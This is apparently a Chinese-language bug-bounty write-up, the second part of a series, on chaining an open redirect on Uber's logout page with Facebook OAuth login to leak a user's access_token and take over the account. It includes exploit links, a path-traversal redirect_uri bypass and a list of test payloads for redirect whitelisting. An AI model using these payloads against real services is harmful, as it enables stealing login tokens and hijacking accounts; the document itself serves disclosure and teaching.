From Open Redirect to Account Takeover Part II

Part I 提及了如何利用 Open Redirect获取 access_token, 基本理论都在 Part I 讲述完了. 本篇在 Part I 的基础上,加上了花俏的伎俩, 成功获得了 Uber 的 access_token.

Uber 集成了 FB Login, auth.uber.com和 login.uber.com都能发起 FB Login, 当点击页面上的 FB 按钮, 会触发以下连接:
https://facebook.com/xxxx?client_id=xxxxxx&redirect_uri=https%3a%2f%2fauth.uber.com%2flogin%3fnext_url=https%3A%2F%2Frush.uber.com%2Flogin%2F&state=m7QWxxPRNII4VGsCSog0xLJ2KF7e8ynpC2c_OAKkQQk%3D

完成 Login 后,先跳转到 https://auth.uber.com/login?next_url=https://rush.uber.com/login/&state=m7QWxxPRNII4VGsCSog0xLJ2KF7e8ynpC2c_OAKkQQk=#access_toekn=xxxx

然后再从 auth.uber.com 跳转到 rush.uber.com.

假如我们能在 next_url 中找到一个 open_redirect, 我们就可以在跳转到 next_url后, 继续跳转到我们想要它去的 domain, 从而获得 access_token.

恰巧的是, 以下连接就有 open-redirect 的问题. Application 会按照 referer header 来 redirect user.

<a href="https://login.uber.com/logout">Click to see</a>

就是说, 假如我们在 www.attacker.com/open-redirect.html 上放置上面的链接, 当用户访问页面后, 点击 URL, 用户就会被 redirect 到 www.attacker.com.

Exploit 1

<a href="https://facebook.com/xxxx?client_id=xxxxxx&redirect_uri=https%3a%2f%2fauth.uber.com%2flogin%3fnext_url=https%3A%2F%2Flogin.uber.com%2Flogout%2F&state=state">Click to leak</a>alert(location.hash)

Exploit 2

后来 Uber 修复了 login.uber.com/logout 的 open-redirect 问题.

Payloads

以下是一系列检查是否正确 whitelist redirect_url 的 payload:

  • redirect_uri=https://www.example.com/directory
  • redirect_uri=https://www.example.com/directory?parameter=value
  • redirect_uri=https://www.example.com/directory?parameter=value#
  • redirect_uri=https://www.example.com/directory/../../
  • redirect_uri=https://www.example.com/directory/../../escaped

结果作者发现了 https://login.uber.com/login%2F..%2F..%2Flogout, 其实是 logout 的 page.

于是 exploit 就是下面的样子:

<a href="https://facebook.com/xxxx?client_id=xxxxxx&redirect_uri=https%3a%2f%2flogin.uber.com%2flogin%252f..%252f..%252flogout&state=state">Click to leak</a>alert(location.hash)

Ref

[Uber] redirect_uri is difficult to do it right – Ron Chan

Show Comments